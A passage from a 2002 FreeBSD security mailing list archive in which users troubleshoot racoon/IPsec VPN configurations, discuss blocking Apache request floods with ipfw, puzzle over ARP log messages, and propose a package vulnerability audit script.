timer for waiting to complete each phase. phase1 30 sec; phase2 15 sec; } remote anonymous { exchange_mode main,aggressive; nonce_size 16; lifetime time 10 min; # sec,min,hour initial_contact on; support_mip6 on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm 3des; hash_algorithm md5; authentication_method pre_shared_key; dh_group 2; } } sainfo anonymous { pfs_group 1; lifetime time 36000 sec; encryption_algorithm 3des; authentication_algorithm hmac_md5,hmac_sha1; compression_algorithm deflate; } Any ideas, insight ? This is driving me insane! :( Matthew >>> Dru 07/27/02 07:36 AM >>> Have you tried a "tcpdump port 500" during Phase 1 negotiations? This will show the proposal exchange so you can see which parts aren't matching up. If that doesn't do it, send that output along with your racoon.conf file. Dru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 11: 4: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8BB4F37B400 for ; Mon, 29 Jul 2002 11:03:59 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C014143E5E for ; Mon, 29 Jul 2002 11:03:58 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TI3wJU022683 for ; Mon, 29 Jul 2002 11:03:58 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TI3vGR022678 for security@freebsd.org; Mon, 29 Jul 2002 11:03:57 -0700 (PDT) Date: Mon, 29 Jul 2002 11:03:57 -0700 (PDT) Message-Id: <200207291803.g6TI3vGR022678@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 11:10:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E1CD837B400 for ; Mon, 29 Jul 2002 11:10:25 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F76C43E4A for ; Mon, 29 Jul 2002 11:10:25 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g6TIAKp10330; Mon, 29 Jul 2002 12:10:20 -0600 (MDT) Message-ID: <3D4584DA.190EEB9C@fpsn.net> Date: Mon, 29 Jul 2002 12:09:30 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Cyrus Cc: security@FreeBSD.ORG Subject: Re: counter apache DoS attacks? References: <20020729050402.Q47608-100000@odsource.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ipfw add deny tcp from to any 80 ;-) Cyrus wrote: > > Several people get their jollies off by having differnet servers > infinitely request my main page thousands of times each therefore shooting > my memory to poo and a lot of bandwidth. But my problem is the memory, not > the bandwidth. I've looked through mod_throttle and such, not for me. Is > there anything out there that can automatically detect and take an action > for this type of attack? I dunno...like use route on the offenders IP and > such. But for it to do this automatically. Anyone have any suggestions? > Thanks in advance. > > -Cyrus > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Colin Faber (303) 736-5160 fpsn.net, Inc. * Black holes are where God divided by zero. * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 11:30:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F09DA37B400 for ; Mon, 29 Jul 2002 11:30:13 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5B3D543E70 for ; Mon, 29 Jul 2002 11:30:13 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA24709; Mon, 29 Jul 2002 12:29:56 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020729122752.00bbcbd0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 29 Jul 2002 12:29:52 -0600 To: Cyrus , security@FreeBSD.ORG From: Brett Glass Subject: Re: counter apache DoS attacks? In-Reply-To: <20020729050402.Q47608-100000@odsource.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org See my presentation from OSCon: http://www.brettglass.com/apacheabuse/ --Brett P.S. -- The material overlaps somewhat with my recent BSDCon presentation, but this talk specifically focused on Apache and how to avoid abuses ranging from address harvesting to worms. At 03:04 AM 7/29/2002, Cyrus wrote: >Several people get their jollies off by having differnet servers >infinitely request my main page thousands of times each therefore shooting >my memory to poo and a lot of bandwidth. But my problem is the memory, not >the bandwidth. I've looked through mod_throttle and such, not for me. Is >there anything out there that can automatically detect and take an action >for this type of attack? I dunno...like use route on the offenders IP and >such. But for it to do this automatically. Anyone have any suggestions? >Thanks in advance. > >-Cyrus > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 12:53:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DFECA37B407; Mon, 29 Jul 2002 12:53:15 -0700 (PDT) Received: from mail.seton.org (ftp.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5249643EE5; Mon, 29 Jul 2002 12:51:39 -0700 (PDT) (envelope-from mgrooms@seton.org) Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id D987CD0077; Mon, 29 Jul 2002 14:49:38 -0500 (CDT) Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Mon, 29 Jul 2002 14:49:38 -0500 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Mon, 29 Jul 2002 14:49:22 -0500 From: "Matthew Grooms" To: , , Subject: Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ... Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ok, Im a moron. I was trying to use the gif griver whan I shouldn't have. As soon as I changed the setkey parameters to a non tunnel device config it started negotiating. ie ..# delete all existing SPD and SAD entries setkey -FP setkey -F setkey -c << EOF spdadd 10.22.200.0/24 10.20.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require; spdadd 10.22.200.0/24 10.21.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require; spdadd 10.22.200.0/24 10.23.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require; spdadd 10.20.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require; spdadd 10.21.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require; spdadd 10.23.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require; EOF When the connection is initiated from the bsd side, traffic passes through the vpn1 box, enencrypted and routed to the remote host without a problem. Unfotunately, the response from the remote host gets caught up on the return trip. I am guessing this is because the bsd and vpn1 box agree on an outbound ( from the bsd boxs perspective ) proposal but cannot agree on an inbound proposal. The checkpoint error logs say 'encryption failure : no response from peer'. However, here is some tcpdump output that shows bi-directional communications. Im not sure how to interperate this. Any ideas anyone? tcpdump: listening on eth0 14:36:16.766265 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: [|sa] (DF) 14:36:17.266091 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 1 R agg: [|sa] 14:36:17.284486 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF) 14:36:17.387671 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF) 14:36:17.487667 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF) 14:36:17.816164 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:18.387787 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:19.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:19.989945 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:21.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:21.939733 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:23.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:23.902725 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:25.817695 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:25.887740 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:27.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:27.893544 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:29.817750 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:29.904151 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:33.817767 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:33.891523 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:37.817766 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:37.897711 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:41.817772 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:41.894646 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:45.817771 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:45.891121 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] 14:36:49.817775 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF) 14:36:49.883577 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash] -Matthew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 16:36:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DE9C237B400 for ; Mon, 29 Jul 2002 16:36:46 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id BF44943E4A for ; Mon, 29 Jul 2002 16:36:45 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6TNb2u32377; Mon, 29 Jul 2002 17:37:02 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: Trish Lynch , Subject: Re: racoon and weirdness.... Date: Mon, 29 Jul 2002 17:37:02 -0600 Message-Id: <20020729233702.M411@babayaga.neotext.ca> In-Reply-To: <20020729103029.R484-100000@trish.dyn.magenet.com> References: <20020729103029.R484-100000@trish.dyn.magenet.com> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was never able to get racoon to actually re-establish: that is if one of my machines went down, all the racoon daemons needed to be restarted. As a first-order observation of what others have been saying, racoon has or exposes problems if all the communicant boxes are not the same. So for now I'm running a manual ipsec config. Dhu Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: Trish Lynch To: Sent: Mon, 29 Jul 2002 10:46:30 -0400 (EDT) Subject: racoon and weirdness.... > I'm working on setting up IPSEC tunnels between a > KAME/racoon/FreeBSD-STABLE box and a Ravlin unit at a client's > > WHat is happening with the one tunnel is this: > > after a couple days, it times out, and neither side > can reestablish traffic between, the log in > /var/log/daemon for racoon tells me the tunnel *is* > established, but I can;t ping through it. If I restart > racoon, it all starts working fine again. > > The second issue is a second machine, with a > cut/pasted config into racoon.conf, with simply the > endpoints changed, does not work at all. > > I can ping the external interface of the Ravlin, but > it doesn;t even *begin* phase 1. > > Here is the racoon.conf: > > remote ravlin-ext-ip [500] > { > exchange_mode main,aggressive; > my_identifier address my-ext-ip; > peers_identifier address ravlin-ext-ip; > generate_policy on; > nonce_size 16; > lifetime time 3 hour; # sec,min,hour > > proposal { > encryption_algorithm 3des; > hash_algorithm md5; > authentication_method pre_shared_key ; > dh_group 1 ; > } > } > > remote ravlin-int-ip [500] > { > exchange_mode main,aggressive; > my_identifier address my-int-ip; > peers_identifier address ravlin-int-ip; > generate_policy on; > nonce_size 16; > lifetime time 3 hour; # sec,min,hour > > proposal { > encryption_algorithm 3des; > hash_algorithm sha1; > authentication_method pre_shared_key ; > dh_group 2 ; > } > } > > sainfo address my-ext-ip/32[0] any address ravlin-ext- > ip/32[0] any { > # pfs_group 2; > lifetime time 10800 sec; > encryption_algorithm 3des ; > authentication_algorithm hmac_md5,hmac_sha1; > compression_algorithm deflate ; > } > > sainfo address my-int-net/23[0] any address ravlin-int- > net/24[0] any { # pfs_group 2; lifetime > time 10800 sec; encryption_algorithm 3des ; > authentication_algorithm hmac_md5,hmac_sha1; > compression_algorithm deflate ; } > > the gif interface is set up as such: > > BSD2 == my machine BSD5 == Ravlin > > $IFCONFIG $GIF3 plumb > $IFCONFIG $GIF3 mtu 1500 > $IFCONFIG $GIF3 inet $BSD2_IP $BSD5_IP > netmask $NETMASK /usr/sbin/setkey -FP > /usr/sbin/setkey -F /usr/sbin/setkey > -c << EOF spdadd $BSD2_PUB_NET > $BSD5_PUB_NET any -P out ipsec > esp/tunnel/${BSD2_PUB_IP}-${BSD5_PUB_IP}/require; > spdadd $BSD5_PUB_NET $BSD2_PUB_NET any -P in ipsec > esp/tunnel/${BSD5_PUB_IP}-${BSD2_PUB_IP}/require; > EOF > > Anyone wanna hit me with a cluebat? > > -Trish > > -- > Trish Lynch trish@egobsd.org > Ecartis Core Team > Key fingerprint = B04E 67CA 3A12 9930 E91C 7730 4606 > 3618 B74A 2493 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 16:53:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D44F937B400 for ; Mon, 29 Jul 2002 16:53:36 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6A21643E5E for ; Mon, 29 Jul 2002 16:53:35 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6TNrCu32408; Mon, 29 Jul 2002 17:53:16 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: "Craig Miller" , "Duncan Patton a Campbell is Dhu" , "faSty" Cc: Subject: Re: wierdness in my security report Date: Mon, 29 Jul 2002 17:53:12 -0600 Message-Id: <20020729235312.M27786@babayaga.neotext.ca> In-Reply-To: <002001c23674$adb8a260$fe01a8c0@Desktop> References: <006301c22e83$2b3d5b30$fe01a8c0@Desktop> <20020718204203.GA71330@i-sphere.com> <20020718204840.M67510@babayaga.neotext.ca> <002001c23674$adb8a260$fe01a8c0@Desktop> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hmm. I saw this shit when I was running a telus adsl link, and the logs for it are long gone. If you can give a better description of your layout it might kick over some of my neurons... I think you are running something like: ATT BSDGATE InternalBox InternalBox . . etc the .1 address is the ATT default router Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: "Craig Miller" To: "Duncan Patton a Campbell is Dhu" , "faSty" Sent: Sun, 28 Jul 2002 13:23:47 -0700 Subject: Re: wierdness in my security report > That is correct, they are not my MAC addresses. Also, > based on the mac address it is Cisco hardware further > pointing toward AT&Ts hardware since my FreeBSD box > definately is not made by Cisco. > > --Craig > > ----- Original Message ----- > From: "Duncan Patton a Campbell is Dhu" > To: "faSty" ; "Craig Miller" > Cc: > Sent: Thursday, July 18, 2002 1:48 PM > Subject: Re: wierdness in my security report > > > This I've seen too, but he sez the mac's aren't his.... > > > > Duncan Patton a Campbell is Duibh ;-) > > > > ---------- Original Message ----------- > > From: faSty > > To: Craig Miller > > Sent: Thu, 18 Jul 2002 13:42:03 -0700 > > Subject: Re: wierdness in my security report > > > > > DO you have bridge on your server? > > > > > > I have that same similar and the bridge 2 ethernet > > > port fight over who master the primary IP address. > > > > > > -fasty > > > > > > On Thu, Jul 18, 2002 at 10:47:21AM -0700, Craig Miller > > > wrote: > > > > Anyone have any ideas as to what might be causing the > > following to appear in my security report? > > > > > > > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:54 to > > 00:b0:64:b7:6f:a8 on dc0 > > > > > Jul 17 05:47:56 server /kernel: arp: 12.236.220.1 moved > > from 00:b0:64:b7:6f:54 to 00:b0:64:b7:6f:a8 on dc0 > > > > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:a8 to > > 00:b0:64:b7:6f:54 on dc0 > > > > > Jul 17 05:47:57 server /kernel: arp: 12.236.220.1 moved > > from 00:b0:64:b7:6f:a8 to 00:b0:64:b7:6f:54 on dc0 > > > > > > > > I thought those : delimited fields would be MAC addresses, > > but they don't match the MAC addresses of either of the two > > cards in my free-bsd box. I have not checked the MAC addresses > > of the other network cards on my network. > > > > > > > > Also, where does the "server /kernel" name come from. > > "kernel" is not the name I gave my kernel, so I am suspicious. > > > > > > > > Thanks, > > > > > > > > --Craig > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the > > > message > > ------- End of Original Message ------- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 16:59:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BA3E937B400 for ; Mon, 29 Jul 2002 16:59:23 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id B4AFF43E70 for ; Mon, 29 Jul 2002 16:59:22 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6TNxGu32430; Mon, 29 Jul 2002 17:59:16 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: Colin Faber , Cyrus Cc: security@FreeBSD.ORG Subject: Re: counter apache DoS attacks? Date: Mon, 29 Jul 2002 17:59:16 -0600 Message-Id: <20020729235916.M5438@babayaga.neotext.ca> In-Reply-To: <3D4584DA.190EEB9C@fpsn.net> References: <20020729050402.Q47608-100000@odsource.com> <3D4584DA.190EEB9C@fpsn.net> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For this to work depends on some things. Is it always the same boxes doing the requests? Same set of boxes? Also, if memory is the problem, not band, there is some kind of apache setting that causes the daemons to suicide and respawn after a number of connections which frees up any memory leaked by the process. It may be you have apache set up to not do this (which is possible to do). Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: Colin Faber To: Cyrus Sent: Mon, 29 Jul 2002 12:09:30 -0600 Subject: Re: counter apache DoS attacks? > ipfw add deny tcp from to any 80 > > ;-) > > Cyrus wrote: > > > > Several people get their jollies off by having differnet servers > > infinitely request my main page thousands of times each therefore shooting > > my memory to poo and a lot of bandwidth. But my problem is the memory, not > > the bandwidth. I've looked through mod_throttle and such, not for me. Is > > there anything out there that can automatically detect and take an action > > for this type of attack? I dunno...like use route on the offenders IP and > > such. But for it to do this automatically. Anyone have any suggestions? > > Thanks in advance. > > > > -Cyrus > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Colin Faber > (303) 736-5160 > fpsn.net, Inc. > > * Black holes are where God divided by zero. * > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 17: 6:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C349237B400 for ; Mon, 29 Jul 2002 17:06:24 -0700 (PDT) Received: from phobos.raisdorf.net (phobos.raisdorf.net [195.244.235.251]) by mx1.FreeBSD.org (Postfix) with ESMTP id CFDBD43E4A for ; Mon, 29 Jul 2002 17:06:22 -0700 (PDT) (envelope-from hscholz@raisdorf.net) Received: (from netadmin@localhost) by phobos.raisdorf.net (8.11.6/8.11.6) with UUCP id g6TNb7u04131 for freebsd-security@freebsd.org; Tue, 30 Jul 2002 01:37:07 +0200 (CEST) X-Authentication-Warning: phobos.raisdorf.net: netadmin set sender to hscholz@raisdorf.net using -f Received: from deimos.raisdorf.net (deimos.raisdorf.net [127.0.0.1]) by deimos.raisdorf.net (Postfix) with SMTP id 84D0067B06 for ; Tue, 30 Jul 2002 10:05:34 +1000 (EST) Date: Tue, 30 Jul 2002 10:05:34 +1000 From: Hendrik Scholz To: freebsd-security@freebsd.org Subject: audit-packages like program for FreeBSD? Organization: no X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20020730000534.84D0067B06@deimos.raisdorf.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! While using NetBSD I discovered the audit-packages package. Basicly it consists of a script and a text file. The text file contains information about packages/ports that are vulnerable to any kind of remote/local/dos attack. The script can be run by the daily cron job and then checks if one of the installed packages is mentioned in the list of vulnerable packages. If so it reports package name, version, type of bug and an URL to an advisory as part of the cron report. The text-file can be updated with ftp/wget/... As I've been thinking about this I just want to know if someone is interested in this for FreeBSD? Writing the script itself should be no problem for me but maintaining the vulnerability database could become difficult as the number of ports grow. A script that crawls through the ports cvs tree and checking for ports marked forbidden since the last run would be a good start but for unmaintained ports bugtraq/vuln-watch/... has to be read. Any ideas how to get more input? Which language to use? Perl would do fine for this job but as Perl isn't in the base system anymore a shell script or c program would be better if it should be possible to run this as part of the daily cron job. If I start with this what language should I use? Thanks for all comments, Hendrik P.S. I won't be able to answer all questions immediatly as I'm on vacation :) -- Hendrik Scholz - - http://raisdorf.net/ drag me, drop me - treat me like an object To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 18:20:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 207F737B400 for ; Mon, 29 Jul 2002 18:20:21 -0700 (PDT) Received: from mail.drkshdw.org (user205.net239.fl.sprint-hsd.net [209.26.20.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id E6DBA43E67 for ; Mon, 29 Jul 2002 18:20:19 -0700 (PDT) (envelope-from scorpio@drkshdw.org) Received: (qmail 77993 invoked by uid 85); 30 Jul 2002 01:20:58 -0000 Received: from scorpio@drkshdw.org by scorpio.DrkShdw.org by uid 82 with qmail-scanner-1.12 (uvscan: v4.1.60/v4205. spamassassin: 2.20. . Clear:. Processed in 0.743099 secs); 30 Jul 2002 01:20:58 -0000 Received: from unknown (HELO router.drkshdw.org) (192.168.134.2) by user205.net239.fl.sprint-hsd.net with SMTP; 30 Jul 2002 01:20:57 -0000 Message-Id: <5.1.1.6.0.20020729212013.00a03140@mail.drkshdw.org> X-Sender: scorpio@mail.drkshdw.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Mon, 29 Jul 2002 21:21:16 -0400 To: Hendrik Scholz , freebsd-security@freebsd.org From: Jeff Palmer Subject: Re: audit-packages like program for FreeBSD? In-Reply-To: <20020730000534.84D0067B06@deimos.raisdorf.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org pkg_version -c works for me If all your ports are updated as needed, security issues are fixed as the portstree is updated ;-) Jeff Palmer scorpio@drkshdw.org At 10:05 AM 7/30/02 +1000, Hendrik Scholz wrote: >Hi! > >While using NetBSD I discovered the audit-packages package. >Basicly it consists of a script and a text file. >The text file contains information about packages/ports that are >vulnerable to any kind of remote/local/dos attack. >The script can be run by the daily cron job and then checks if one of the >installed packages is mentioned in the list of vulnerable packages. >If so it reports package name, version, type of bug and an URL to an >advisory as part of the cron report. >The text-file can be updated with ftp/wget/... > >As I've been thinking about this I just want to know if someone is >interested in this for FreeBSD? > 